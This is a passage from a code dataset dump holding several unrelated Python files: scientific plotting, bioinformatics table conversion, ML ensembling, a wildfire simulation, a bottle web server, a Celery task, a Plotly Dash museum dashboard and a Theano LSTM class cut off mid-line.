full')\nax[0].plot(t_grid, h_P_mlgw_T[0,:,0], label = 'mlgw twist')\nax[0].plot(t_grid, h_22, label = 'IMR - J0')\n#ax[0].plot(t_grid_lal, h_22_P_lal, label = 'IMR - L0')\nax[1].set_title(\"21 P\")\nax[1].plot(t_grid, h_P_mlgw[0,:,1], label = 'mlgw full')\nax[1].plot(t_grid, h_P_mlgw_T[0,:,1], label = 'mlgw twist')\nax[1].plot(t_grid, h_21, label = 'IMR - J0')\n#ax[1].plot(t_grid_lal, h_21_P_lal, label = 'IMR - L0')\nax[1].legend()\nfig.tight_layout()\n\nif False:\n\tplt.figure()\n\tplt.title(\"ph diff\")\n\tplt.plot(t_grid, np.unwrap(np.angle(h_NP_mlgw[0,:,0])) - np.unwrap(np.angle(h_22_NP)), label = '22')\n\tplt.plot(t_grid, np.unwrap(np.angle(h_NP_mlgw[0,:,1])) - np.unwrap(np.angle(h_21_NP)), label = '21')\n\tplt.legend()\n\n\n\n\nplt.show()\n","sub_path":"precession/twist_IMR.py","file_name":"twist_IMR.py","file_ext":"py","file_size_in_byte":5760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"2977453","text":"\"\"\"Convert nci paths to gene pathway\"\"\"\nimport argparse\n\ndef main(args):\n with open(args.nciPathFile) as f, open(args.outFile, 'w') as fout:\n print('gene\\tpathway', file=fout)\n for line in f:\n pathName, pathId, geneLs = line.strip().split('\\t')\n for gene in geneLs.split(','):\n print(gene + '\\t' + pathName, file=fout)\n\nif __name__ == \"__main__\":\n desc = 'Mk table of gene pathway'\n parser = argparse.ArgumentParser(description=desc)\n argLs = ('nciPathFile',\n 'outFile')\n for param in argLs:\n parser.add_argument(param)\n args = parser.parse_args()\n main(args)\n","sub_path":"code/scripts/mkNciPathTabData.py","file_name":"mkNciPathTabData.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"522370814","text":"# Kernel preparation\n\n# Warning suppression\nimport warnings\nwarnings.simplefilter('ignore')\nimport numpy as 
np\nnp.warnings.filterwarnings('ignore')\nnp.random.seed(1001)\n# Cliche\nimport os\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nimport IPython\nimport pandas as pd\n# import seaborn as sns\n\ndef play_audio(data):\n IPython.display.display(IPython.display.Audio(data=data))\n\n# =========================================================================================\n\n# Dataset preparation\n\n# Root folder that contains entire dataset\nDATAROOT = '/data/voice_zaloai/data'\ndf_train = pd.read_csv(DATAROOT + '/full_train_accent.csv')\ndf_test = pd.read_csv(DATAROOT + '/test.csv')\n\n# =========================================================================================\n\ndef pred_geometric_mean(preds_set):\n predictions = np.ones_like(preds_set[0])\n for preds in preds_set:\n predictions = predictions*preds\n predictions = predictions**(1./len(preds_set))\n return predictions\n\ndef pred_geometric_mean_by_files(npy_pred_files):\n preds_set = np.array([np.load(file) for file in npy_pred_files])\n predictions = pred_geometric_mean(preds_set)\n return predictions\n\n# =========================================================================================\n\nmodel_types = [\"alexnet\", \"seresnet\", \"vgg16\"]\nresolution_types = [\"LH\", \"X\"]\n\ndef get_all_prediction_files(root_path):\n for m in model_types:\n for r in resolution_types:\n for i in range(5):\n path = root_path + \"/%s/%s/test_predictions_%d.npy\" % (m, r, i)\n if os.path.exists(path):\n yield path\n\ndef get_result(pred_files):\n ensembled_test_preds = pred_geometric_mean_by_files(pred_files)\n result = np.array([np.argmax(x) for x in ensembled_test_preds])\n return result\n\n# =========================================================================================\n\ngender_test_pred_files = list(get_all_prediction_files(\"./gender_result\"))\naccent_test_pred_files = list(get_all_prediction_files(\"./accent_result\"))\n\ngender_result = get_result(gender_test_pred_files)\naccent_result = 
get_result(accent_test_pred_files)\n\ndf_test['gender'] = gender_result\ndf_test['accent'] = accent_result\n\ndf_test.columns = ['id', 'gender', 'accent']\n\ndf_test.to_csv(\"prediction_result.csv\", index=False)\n\n# =========================================================================================\n# =========================================================================================\n# =========================================================================================","sub_path":"src/XLH/ensemble/ensemble_result.py","file_name":"ensemble_result.py","file_ext":"py","file_size_in_byte":2619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"275495921","text":"import wildfire\nimport numpy as np\nimport plots as p\n\n\"\"\"\nTrying to copy Asensio 2002 experiment\nusing complete PDE system, K(u) != k\n\"\"\"\nM, N = 161, 161 #128, 128\nL = 1500 # Timesteps\ndt = 1e-2 # dt\nxa, xb = 0, 300 # x domain limit\nya, yb = 0, 300 # y domain limit\nx = np.linspace(xa, xb, N) # x domain\ny = np.linspace(ya, yb, M) # y domain\nt = np.linspace(0, dt*L, L) # t domain\n\n# Dimensional parameters\nT_inf = 300 # kelvin\nt_0 = 8987 # seconds\nl_0 = 0.3 # meters\n\n# Temperature initial condition\nu0 = lambda x, y: 4.8e0*np.exp(-5e-3*((x-75)**2 + (y-75)**2)) \n\n# Fuel initial condition\nb0 = lambda x, y: np.round(np.random.uniform(size=(x.shape)), decimals=2)#x*0 + 1 #S(x+.25, y+.25) #x*0 + 1\n\n# Wind effect\ngamma = 1e-2#e-3\nw1 = lambda x, y, t: gamma * 300 + x*0 \nw2 = lambda x, y, t: gamma * 300 + y*0 \nW = (w1, w2)\n\n# Vector\nv1 = lambda x, y, t: w1(x, y, t)\nv2 = lambda x, y, t: w2(x, y, t)\nV = (v1, v2)\n\n# Parameters\nkappa = 1e-1 # diffusion coefficient\nepsilon = 3e-1 # inverse of activation energy\nupc = 1 # 1 # u phase change # Smaller upc -> bigger fire front\nq = 1 # reaction heat\nalpha = 1e-3 # natural convection\n\n# Meshes for initial condition plots\n#X, Y = np.meshgrid(x, y)\n\n# Plot 
initial conditions\n#p.plotIC(X, Y, u0, b0, V, W, T=None, top=None)\n\n# Parameters for the model\nparameters = {\n 'u0': u0, \n 'beta0': b0,\n 'v': V,\n 'kappa': kappa, \n 'epsilon': epsilon, \n 'upc': upc, \n 'q': q, \n 'alpha': alpha, \n 'x': x, \n 'y': y,\n 't': t,\n 'sparse': True,\n 'show': False,\n 'complete': True\n}\n\nct = wildfire.fire(parameters)\n\n\n# Finite difference in space\nU, B = ct.solvePDE('fd', 'rk4')\n\n#ct.plots(U, B)\n\n# PLOT JCC\nX, Y = np.meshgrid(x, y)\np.plotJCC(t, X, Y, U, B, W, T=None, save=False)\n","sub_path":"experiments/asensio_test.py","file_name":"asensio_test.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"235590260","text":"# -*- coding: utf-8 -*-\nCOPYRIGHT = \"Copyright(c)2014 koo@kormail.net All rights reserved\"\n\nfrom gevent import monkey\nmonkey.patch_all()\nimport bottle\nimport handlers\nimport logging.config\nfrom beaker.middleware import SessionMiddleware\ntry:\n import ConfigParser as configparser\nexcept ImportError:\n import configparser\n\nfrom user import UserManager\nfrom friend import FriendManager\nfrom post import PostManager\nfrom version import get_version\nimport utilities\n\n\nclass ServerApp(SessionMiddleware):\n\n def __init__(self, name):\n self.name = name\n self.parse_config(\"server.ini\")\n\n self.usermgr = UserManager(name)\n self.friendmgr = FriendManager(name, self.usermgr)\n self.postmgr = PostManager(name, self.friendmgr, self.publichost)\n\n self.userdb = self.usermgr.get_conn\n self.frienddb = self.friendmgr.get_conn\n self.postdb = self.postmgr.get_conn\n\n self.util = utilities\n super(type(self), self).__init__(bottle.app(), self.session_opts)\n\n def parse_config(self, config_file_name):\n logging.config.fileConfig(config_file_name)\n config = configparser.RawConfigParser()\n config.read(config_file_name)\n\n for option, value in config.items(self.name):\n try:\n _val = eval(value)\n 
except:\n _val = value\n setattr(self, option, _val)\n\n self.fileserver = config.get(\"tinyfile\", \"publichost\")\n\n session_opts = {}\n for option, value in config.items(\"session\"):\n key = \"session.\" + option\n session_opts[key] = value\n self.session_opts = session_opts\n\n host, port = self.bind.split(\":\")\n self.host = host\n self.port = int(port)\n\n def plugin(self, callback):\n def wrapper(*args, **kwargs):\n body = callback(self, *args, **kwargs)\n return body\n return wrapper\n\n\nif __name__ == \"__main__\":\n app = ServerApp(\"tinypost\")\n logging.info(\"{0} {1} {2}\".format(app.name,\n get_version(verbose=True),\n COPYRIGHT))\n\n bottle.install(app.plugin)\n bottle.run(app=app, host=app.host, port=app.port, debug=__debug__)\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"553776176","text":"import logging\nfrom celery import shared_task\n\nlogger = logging.getLogger(__name__)\n\n\n@shared_task(name='bims.tasks.search_task', queue='update')\ndef search_task(parameters, search_process_id):\n from bims.utils.celery import memcache_lock\n from bims.api_views.search import Search\n from bims.models.search_process import (\n SearchProcess,\n SEARCH_PROCESSING,\n SEARCH_FINISHED,\n SEARCH_FAILED\n )\n\n try:\n search_process = SearchProcess.objects.get(id=search_process_id)\n except SearchProcess.DoesNotExist:\n return\n\n lock_id = '{0}-lock-{1}'.format(\n search_process.file_path,\n search_process.process_id\n )\n\n oid = '{0}'.format(search_process.process_id)\n\n with memcache_lock(lock_id, oid) as acquired:\n if acquired:\n search_process.set_status(SEARCH_PROCESSING)\n\n search = Search(parameters)\n search_results = search.get_summary_data()\n if search_results:\n search_process.set_search_raw_query(\n search.location_sites_raw_query\n )\n search_process.create_view()\n 
search_process.set_status(SEARCH_FINISHED, False)\n search_results['status'] = SEARCH_FINISHED\n search_results['extent'] = search.extent()\n search_process.save_to_file(search_results)\n else:\n search_process.set_status(SEARCH_FAILED)\n return\n\n\n logger.info(\n 'Search %s is already being processed by another worker',\n search_process.process_id)\n","sub_path":"bims/tasks/search_version_2.py","file_name":"search_version_2.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"125106746","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nfrom dash.exceptions import PreventUpdate\nimport gunicorn\n\nimport numpy as np\nimport pandas as pd\nfrom re import search\n\nimport plotly.graph_objects as go\nimport plotly.express as px\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\ndata = pd.read_csv('data.csv')\n\n\ndef classes_fromto(year1=1929, year2=2020):\n return px.bar(data[(data['DateAcquired'] >= year1) & (data['DateAcquired'] <= year2)]['Classification'].value_counts(), labels=dict(value='count', index='classes')).update_layout(showlegend=False, title=f'Classes distribution from {year1} to {year2}')\n\n\ndef countries_distribution(year=2020, group_smallest=True, group_method='mean'):\n temp = data[data['DateAcquired'] <= year]['Country'].value_counts()\n if group_smallest:\n other = temp[temp <= (np.mean(temp) if group_method ==\n 'mean' else np.median(temp))]\n temp.drop(other.index, inplace=True)\n temp = temp.append(pd.Series({'Other': np.sum(other)}))\n return px.bar(temp, labels=dict(value='count', index='countries')).update_layout(showlegend=False, title=f'Countries distribution in {year}')\n\n\ndef bar_with_animation():\n classes = ['Architecture', 'Design', 'Drawing', 'Illustrated Book', 'Painting', 'Photograph', 'Print', 'Sculpture']\n temp = 
pd.DataFrame(columns=['Year', 'Classification', 'Count'])\n for year in sorted(data['DateAcquired'].unique()):\n for class_ in classes:\n count = data[(data['DateAcquired'] == year) & (data['Classification'] == class_)].count()['Title']\n temp = temp.append({'Year': year, 'Classification': class_, 'Count': count}, ignore_index=True)\n temp['CountLog'] = temp[temp['Count'] != 0]['Count'].astype(float).apply(np.log)\n temp['Count'] = temp[temp['Count'] != 0]['Count'].astype(int)\n temp = temp.replace(np.nan, 0)\n fig = px.bar(\n temp,\n x='Classification',\n y='CountLog',\n animation_frame='Year',\n labels={'CountLog': 'Number of Artworks (log)', 'Count': 'Number of artworks'},\n color_discrete_sequence=['#3DCCC0'],\n range_y=[0.1, max(temp['CountLog'])],\n hover_data={'Year': False, 'Classification': False, 'Count': True, 'CountLog': False}\n )\n fig.update_layout(uniformtext_minsize=8, uniformtext_mode='hide')\n fig.update_layout(\n title=dict(text='Classification of Acquired Artworks',\n x=0.05, y=0.95\n ),\n template='ggplot2'\n )\n return fig\n\n\ndef acquired_plot(total=True):\n\n if total:\n temp = data.groupby('DateAcquired').count().cumsum().reset_index()\n else:\n temp = data.groupby('DateAcquired').count().reset_index()\n\n fig = go.Figure()\n\n fig.add_trace(\n go.Scatter(\n x=temp['DateAcquired'],\n y=temp['Artist']\n )\n )\n\n fig.update_layout(\n title='Total number of art acquired' if total else 'Arts acquired',\n xaxis_title='Year',\n yaxis_title='Arts',\n )\n\n return fig\n\ndef sunburst(countries=None):\n if countries:\n temp = data[data['Country'].isin(countries)]\n else:\n temp = data.copy()\n fig = px.sunburst(temp, path=['Department', 'Classification'], color_discrete_sequence=['#4a4bc7'])\n fig.update_traces(\n go.Sunburst(hovertemplate='Number of artworks=%{value}'\n ))\n fig.update_layout(\n title=dict(text='Artworks Classification Arranged by Department', font=dict(color='black'))\n )\n return fig\n\ndef genders_chart():\n df = 
pd.pivot_table(data, index='DateAcquired', columns='Gender', values='Artist', aggfunc='count')\n df = df.reset_index()\n\n fig = go.Figure()\n\n fig.add_trace(go.Scatter(\n x=df['DateAcquired'], y=df['Female'],\n fillcolor='rgb(111, 231, 219)',\n mode='lines',\n line=dict(width=0.5, color='rgb(111, 231, 219)'),\n stackgroup='one',\n name='Female',\n groupnorm='percent', # sets the normalization for the sum of the stackgroup\n hovertemplate='Year=%{x}' + '
    Percentage=%{y:.2f}' + '%'\n\n ))\n\n fig.add_trace(go.Scatter(\n x=df['DateAcquired'], y=df['Male'],\n fillcolor='rgb(74, 75, 199)',\n mode='lines',\n line=dict(width=0.5, color='rgb(74, 75, 199)'),\n stackgroup='one',\n name='Male',\n hovertemplate='Year: %{x}' + '
    Percentage: %{y:.2f}' + '%'\n ))\n\n fig.update_layout(\n title=dict(text='Gender of Artists Over Time',\n x=0.05, y=0.95\n ),\n showlegend=True,\n legend=dict(\n orientation=\"v\",\n yanchor=\"top\",\n y=0.95,\n xanchor=\"left\",\n x=0.02,\n font=dict(family=\"Arial\", size=12),\n bordercolor=\"white\",\n borderwidth=1,\n itemsizing='trace'\n ),\n xaxis_type='linear',\n yaxis=dict(\n type='linear',\n range=[1, 100],\n ticksuffix='%'))\n\n fig.update_yaxes(title='Percentage of Artworks Acquired')\n fig.update_xaxes(title='Year Acquired')\n fig.update_layout(template=\"simple_white\")\n\n return fig\n\ndef line_chart_nationalities():\n temp = data.groupby(['DateAcquired', 'Country'])['Title'].count().reset_index().rename({'Title': 'Count'}, axis=1)\n # Number of different countries per year\n temp2 = temp.groupby('DateAcquired')['Country'].count().reset_index()\n\n # Number of new countries by the years\n new_country = []\n new = []\n temp2['New'] = np.nan\n for year in temp['DateAcquired'].unique():\n country_year = temp[temp['DateAcquired'] == year]['Country'].values\n new_year = [country for country in country_year if country not in new_country]\n for n in new_year: new_country.append(n)\n new.append(len(new_country))\n temp2['New'] = new\n temp2.rename({'Country': 'Different nationalities by year', 'New': 'Different nationalities until that year'},\n axis=1, inplace=True)\n\n fig = px.line(temp2, x='DateAcquired',\n y=['Different nationalities by year', 'Different nationalities until that year'],\n hover_data={'DateAcquired': False, 'variable': False, 'value': True},\n color_discrete_sequence=['#9acfbf','#3eceaf'],\n labels={'DateAcquired': 'Year Artworks were Acquired', 'variable': '', 'value': 'Number of Nationalities'}\n )\n\n fig.update_layout(\n title=dict(text='Diversity of Artists\\' Origins Over Time',\n x=0.05, y=0.95\n ),\n template='ggplot2',\n hovermode=\"x\",\n legend=dict(\n orientation=\"v\",\n yanchor=\"top\",\n y=0.95,\n xanchor=\"left\",\n 
x=0.02,\n font=dict(family=\"Arial\", size=12),\n bordercolor=\"white\",\n borderwidth=1,\n itemsizing='trace'\n )\n )\n fig.update_traces(hovertemplate='%{y}',\n line=dict(width=3))\n\n return fig\n\ndef map_with_animation():\n # 2 options (comment the one you don't want)\n ### With growth\n temp = data.groupby(['DateAcquired', 'Country'])['Title'].count().unstack().replace(np.nan, 0).cumsum()\n temp = pd.DataFrame(temp.stack()).reset_index().rename({0: 'Count'}, axis=1)\n\n # logarithm\n temp['Countlog'] = np.log(temp['Count'])\n\n fig = px.choropleth(temp, locations='Country', locationmode='country names',\n color='Countlog',\n color_continuous_scale=['#e8e6ff', '#dcd9ff', '#b2b0ff', '#8889e0', '#6063b6', '#4a4bc7', '#33357f'],\n animation_frame='DateAcquired',\n range_color=(0, temp['Countlog'].max()),\n hover_name='Country',\n hover_data={'Country':False,'Count':True,'Countlog':False,'DateAcquired':False},\n labels={'DateAcquired': 'Year', 'Countlog': 'Acquired
    Artworks (log)','Count': 'Acquired Artworks'}\n #projection=\"natural earth\"\n )\n fig.update_layout(\n title=dict(text='Artworks\\' Nationality Evolution',\n x=0.1,y=0.95,\n font=dict(color='black')\n )\n )\n return fig\n\n\ndef statistics(countries = None):\n if countries:\n temp = data[data['Country'].isin(countries)]\n else:\n temp = data.copy()\n unique_artsits = temp['Artist'].unique().shape[0]\n unique_artworks = temp['Title'].unique().shape[0]\n gender_counts = temp['Gender'].value_counts(normalize = True) * 100\n try:\n male = str(round(gender_counts['Male'], 2)) + '%'\n except:\n male = '0.0%'\n try:\n female = str(round(gender_counts['Female'], 2)) + '%'\n except:\n female = '0.0%'\n\n\n return unique_artsits, unique_artworks, male, female\n\n\ndef unique_countries():\n # select countries with paintings works\n classification_paint = ['Drawing', 'Painting', 'Work on Paper']\n data_withpaint = data[data.Classification.isin(classification_paint)]\n\n return data_withpaint['Country'].sort_values().unique()\n\ndef filter_technique(technique):\n if search('and', technique):\n return 'Mixed'\n elif search('mixed', technique.lower()):\n return 'Mixed'\n elif search('oil', technique.lower()):\n return 'Oil'\n elif search('charcoal', technique.lower()):\n return 'Charcoal'\n elif search('acrylic', technique.lower()):\n return 'Acrylic'\n elif search('tempera', technique.lower()):\n return 'Tempera'\n elif search('pencil', technique.lower()):\n return 'Pencil'\n elif search('ink', technique.lower()):\n return 'Ink'\n elif search('watercolour', technique.lower()):\n return 'Watercolour'\n elif search('watercolor', technique.lower()):\n return 'Watercolour'\n elif search('crayon', technique.lower()):\n return 'Crayon'\n elif search('gouache', technique.lower()):\n return 'Gouache'\n elif search('paint', technique.lower()):\n return 'Paint'\n elif search('dye', technique.lower()):\n return 'Paint'\n elif search('pigment', technique.lower()):\n return 'Paint'\n 
elif search('pastel', technique.lower()):\n return 'Pastel'\n\n else:\n return 'Other'\n\n\ndef donut_chart(countries = None):\n if countries:\n temp = data[data['Country'].isin(countries)]\n else:\n temp = data.copy()\n data_drawings = temp[(data.Classification == 'Drawing') | (\n data.Classification == 'Painting') | (data.Classification == 'Work on Paper')]\n data_drawings['Technique'] = data_drawings['Medium'].apply(\n filter_technique)\n data_drawings = data_drawings[data_drawings['Medium']\n != 'Not known'].reset_index()\n\n # Create donut graph for different techniques\n donut_chart = go.Figure()\n sum_counts = data_drawings['Technique'].value_counts().sort_index()\n # Colour palette for graph\n colors = ['#516CCC', # Acrylic\n\n '#7799E0', # Charcoal\n\n '#6084B6', # Crayoin\n\n '#82BCFA', # goauche\n\n '#3DCCC0', # ink\n\n '#00ae91', # mixed\n\n '#00C2B2', # oil\n\n '#63E6E3', # other\n\n '#8DD8EB', # paint\n\n '#4A4BC7', # pastel\n\n '#81D7CF', # pencil\n\n '#7087CF', # tempera\n\n '#7DADE6'] # watecolour\n\n donut_chart.add_trace(go.Pie(values=sum_counts,\n labels=sum_counts.index,\n hole=0.88,\n hovertemplate=\"%{label}
    Number of artworks=%{value}\",\n marker=dict(colors=colors, line=dict(color='#ffffff', width=1))\n ))\n donut_chart.update_layout(\n title=dict(text='Most Popular Painting Techniques',font=dict(color='black')),\n showlegend=True,\n annotations=[dict(text='Techniques
    used
    by artists', x=0.5, y=0.5, font_size=20, showarrow=False)])\n\n return donut_chart\n\n\napp = dash.Dash(__name__,\n title=\"MoMA on Tour\", suppress_callback_exceptions=True)\n\napp.layout = dcc.Loading(\n html.Div(\n children=[\n # title\n html.Div(\n children=[\n html.Img(\n src=app.get_asset_url(\"moma-logo.png\"),\n style={'width': '80%', 'margin-top': '10px'}\n ),\n ],\n style={'width': '25%'}\n ),\n html.Div(\n children=[\n html.H5('The Museum of Modern Art (MoMA) acquired its first artworks in 1929.'\n ' Today, the Museum’s evolving collection contains almost 200,000 works'\n ' from around the world spanning the last 150 years. In this dashboard, '\n 'you can go on tour with the MoMA museum by getting insights into which '\n 'artworks it acquired over the years and by which artists. Next, you can '\n 'see MoMA per country by checking which country the art pieces come from. '\n 'The art collections include an ever-expanding range of visual expression, '\n 'including painting, sculpture, photography, architecture, design, and '\n 'film art. 
Travel through time and space with MoMA and enjoy the tour...'),\n ],\n className='card',\n style={\"height\": \"25%\",\"width\":\"70%\"},\n ),\n #1st row\n html.Div(\n children=[\n #1st column\n dcc.Graph(\n figure=line_chart_nationalities(),\n className='card',\n style={\"width\": \"50%\"},\n ),\n #2nd column\n html.Div(\n children=[\n dcc.Loading([\n dcc.Graph(figure=map_with_animation(),\n id='main-choropleth')],\n type='default', color='black', id=\"map-loading\"\n )\n ],\n className='card',\n style={'width': '50%'}\n ),\n ],\n className='container'\n ),\n\n #2nd row\n html.Div(\n children=[\n\n dcc.Graph(\n figure=genders_chart(),\n className='card',\n style={\n \"width\": \"40%\"\n }\n ),\n dcc.Graph(\n figure=bar_with_animation(),\n className='card',\n style={\n \"width\": \"55%\"\n }\n ),\n ],\n className='container'\n ),\n\n #3rd row\n html.Div(\n children=[\n html.Div(\n children=[\n html.H2(\"Choose countries\"),\n dcc.Dropdown(\n options=[{'label': v, 'value': v}\n for v in unique_countries()],\n multi=True,\n id='countries-dropdown'),\n ],\n className='first card',\n style={'width': '40%', 'float': 'right'}\n ),\n html.Div(children=[\n html.H2('Artists'),\n html.H3('123', id='unique-artists')\n ],\n className='card small'\n ),\n html.Div(\n children=[\n html.H2('Artworks'),\n html.H3('123', id='unique-artworks')\n ],\n className='card small'\n ),\n html.Div(\n children=[\n html.H2('Gender'),\n html.H3('Male:'),\n html.H3('123%', id='male-count'),\n html.H3(' Female:'),\n html.H3('123%', id='female-count')\n ],\n className=' card small'\n ),\n ],\n className='container'\n ),\n\n #4th row\n html.Div(\n children=[\n dcc.Graph(\n figure=sunburst(),\n className='card',\n style={'width': '50%'},\n id='sunburst'\n ),\n dcc.Graph(\n figure=donut_chart(),\n className='card',\n style={'width': '50%'},\n id='donut'\n )\n\n ],\n className='container'\n ),\n\n\n\n html.Footer([\n html.Label([\"Anastasiia Tagiltseva, m20200041 | Beatriz Pereira, m20200674 | Nadine 
Aldesouky, m20200568 | Svitlana Vasylyeva, m20200617| \"\n \"Source: \", html.A(\"MoMA\",\n href=\"https://github.com/MuseumofModernArt/collection\", target=\"_blank\")])\n\n ],\n className=\"footer\"\n ),\n ]),\n type = 'cube', color='white')\n\nserver = app.server\n\n@app.callback(\n Output('unique-artists', 'children'),\n Output('unique-artworks', 'children'),\n Output('male-count', 'children'),\n Output('female-count', 'children'),\n Output('sunburst', 'figure'),\n Output('donut', 'figure'),\n Input('countries-dropdown', 'value')\n)\ndef update_stats(value):\n stats = statistics(value)\n return stats[0], stats[1], stats[2], stats[3], sunburst(value), donut_chart(value)\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":18550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"451099081","text":"#! /usr/bin/env python\n#-*- coding: utf-8 -*-import numpy\n\nimport numpy as np\nimport pickle as pkl\nimport theano\nimport theano.tensor as T\nimport matplotlib as plt\nfrom theano.tensor.shared_randomstreams import RandomStreams\nfrom theano import function\nfrom sklearn.model_selection import train_test_split\nimport timeit\nimport os\nimport sys\n\nclass LSTMlayer:\n def __init__(self,n_input,n_hidden,n_output):\n self.n_input = n_input\n self.n_hidden = n_hidden\n #input\n #srng = RandomStreams(seed=234)\n init_wi0 = np.array(np.random.uniform(low=-np.sqrt(1./n_input),high=(np.sqrt(1./n_input)) ,size=(n_input,n_hidden)),dtype=theano.config.floatX)\n init_wi1 = np.array(np.random.uniform(low=-np.sqrt(1. / n_input), high=(np.sqrt(1. / n_input)), size=(n_hidden,n_hidden)),dtype=theano.config.floatX)\n init_wi2 = np.array(np.random.uniform(low=-np.sqrt(1. / n_input), high=(np.sqrt(1. 
/ n_input)), size=(n_hidden,n_hidden)),dtype=theano.config.floatX)\n init_bi = np.zeros(shape=(n_hidden,),dtype=theano.config.floatX)\n self.wi0 = theano.shared(value=init_wi0,name='wi0')\n self.wi1 = theano.shared(value=init_wi1, name='wi1')\n self.wi2 = theano.shared(value=init_wi2, name='wi2')\n self.bi = theano.shared(value=init_bi,name='bi')\n\n #forget\n init_wf0 = np.array(np.random.uniform(low=-np.sqrt(1./n_input),high=(np.sqrt(1./n_input)) ,size=(n_input,n_hidden)),dtype=theano.config.floatX) #dot遵循正常矩阵的乘法\n init_wf1 = np.array(np.random.uniform(low=-np.sqrt(1. / n_input), high=(np.sqrt(1. / n_input)), size=(n_hidden,n_hidden)),dtype=theano.config.floatX)\n init_wf2 = np.array(np.random.uniform(low=-np.sqrt(1. / n_input), high=(np.sqrt(1. / n_input)), size=(n_hidden,n_hidden)),dtype=theano.config.floatX)\n init_bf = np.zeros(shape=(n_hidden,),dtype=theano.config.floatX)\n self.wf0 = theano.shared(value=init_wf0,name='wf0')\n self.wf1 = theano.shared(value=init_wf1, name='wf1')\n self.wf2 = theano.shared(value=init_wf2, name='wf2')\n self.bf = theano.shared(value=init_bf,name='bf')\n #cell\n init_wc0 = np.array(np.random.uniform(low=-np.sqrt(1./n_input),high=(np.sqrt(1./n_input)) ,size=(n_input,n_hidden)),dtype=theano.config.floatX)\n init_wc1 = np.array(np.random.uniform(low=-np.sqrt(1. / n_input), high=(np.sqrt(1. / n_input)), size=(n_hidden,n_hidden)),dtype=theano.config.floatX)\n init_wc2 = np.array(np.random.uniform(low=-np.sqrt(1. / n_input), high=(np.sqrt(1. 
/ n_input)), size=(n_hidden,n_hidden)),dtype=theano.config.floatX)\n init_bc = np.zeros(shape=(n_hidden,),dtype=theano.config.floatX)\n self.wc0 = theano.shared(value=init_wc0,name='wc0')\n self.wc1 = theano.shared(value=init_wc1, name='wc1')\n self.wc2 = theano.shared(value=init_wc2, name='wc2')\n self.bc = theano.shared(value=init_bc,name='bc')\n\n #output\n init_wo0 = np.array(np.random.uniform(low=-np.sqrt(1./n_input),high=(np.sqrt(1./n_input)) ,size=(n_input,n_hidden)),dtype=theano.config.floatX)\n init_wo1 = np.array(np.random.uniform(low=-np.sqrt(1. / n_input), high=(np.sqrt(1. / n_input)), size=(n_hidden,n_hidden)),dtype=theano.config.floatX)\n init_wo2 = np.array(np.random.uniform(low=-np.sqrt(1. / n_input), high=(np.sqrt(1. / n_input)), size=(n_hidden,n_hidden)),dtype=theano.config.floatX)\n init_bo = np.zeros(shape=(n_hidden,),dtype=theano.config.floatX)\n self.wo0 = theano.shared(value=init_wo0,name='wo0')\n self.wo1 = theano.shared(value=init_wo1, name='wo1')\n self.wo2 = theano.shared(value=init_wo2, name='wo2')\n self.bo = theano.shared(value=init_bo,name='bo')\n\n self.params1 = [self.wi0,self.wi1,self.wi2,self.bi,self.wf0,self.wf1,self.wf2,self.bf,self.wc0,self.wc1,self.wc2,self.bc]\n\n #classifier\n init_w = np.array(np.random.uniform(low=-np.sqrt(1./n_input),high=np.sqrt(1./n_input),size=(n_hidden,n_output)),dtype=theano.config.floatX)\n init_b = np.array(np.random.uniform(low=-np.sqrt(1./n_input),high=np.sqrt(1./n_input),size=(n_output)),dtype=theano.config.floatX)\n self.w = theano.shared(value=init_w,name='w')\n self.b = theano.shared(value=init_b,name='b')\n self.params2 = [self.w,self.b]\n\n self.params = self.params1 + self.params2\n\n def _cellcalculate(x,bh,sc): #bh和sc需要自己定义初值\n ai = T.dot(self.wi0,x)+T.dot(self.wi1,bh)+T.dot(self.wi2,sc)\n _bi = T.nnet.hard_sigmoid(ai+self.bi)\n\n af = T.dot(self.wf0,x)+T.dot(self.wf1,bh)+T.dot(self.wf2,sc)\n _bf = T.nnet.hard_sigmoid(af+self.bf)\n\n ac = 
T.dot(self.wc0,x)+T.dot(self.wc1,bh)+T.dot(self.wc2,sc)\n _bc = T.tanh(ac+self.bc)\n sc = _bf*sc + _bi*_bc\n\n ao = T.dot(self.wo0,x)+T.dot(self.wo1,bh)+T.dot(self.wo2,sc)\n _bo = T.nnet.hard_sigmoid(ao+self.bo)\n\n bh = _bo*(T.tanh(sc))\n\n return [bh,sc]\n\n self.x = T.matrix('x')\n self.y = T.ivector('y')\n self.lr = T.scalar('lr')\n [result_b, result_s], updates = theano.scan(_cellcalculate,\n truncate_gradient=-1,\n sequences=self.x,\n outputs_info=[np.zeros(self.n_hidden),np.zeros(self.n_hidden)]) # 全都初始化为0,不知道对不对.\n\n classiffier = T.nnet.softmax(T.dot(result_b,self.w)+self.b)\n _predict = T.argmax(classiffier)\n self.predict = theano.function(\n inputs=[self.x],\n outputs=_predict,\n allow_input_downcast=True\n )\n\n self._negative_log_likelihood = -T.mean(T.log(classiffier)[T.arange(self.y.shape[0]),self.y])\n\n self.gparams =T.grad(self._negative_log_likelihood,self.params)\n updates = [(params,params-self.lr*gparam)for params,gparam in zip(self.params,self.gparams)]\n self.negative_log_likehood = theano.function(\n inputs = [self.x,self.y,self.lr],\n outputs = self._negative_log_likelihood,\n updates = updates,\n allow_input_downcast=True\n )\n _precision = 1. 
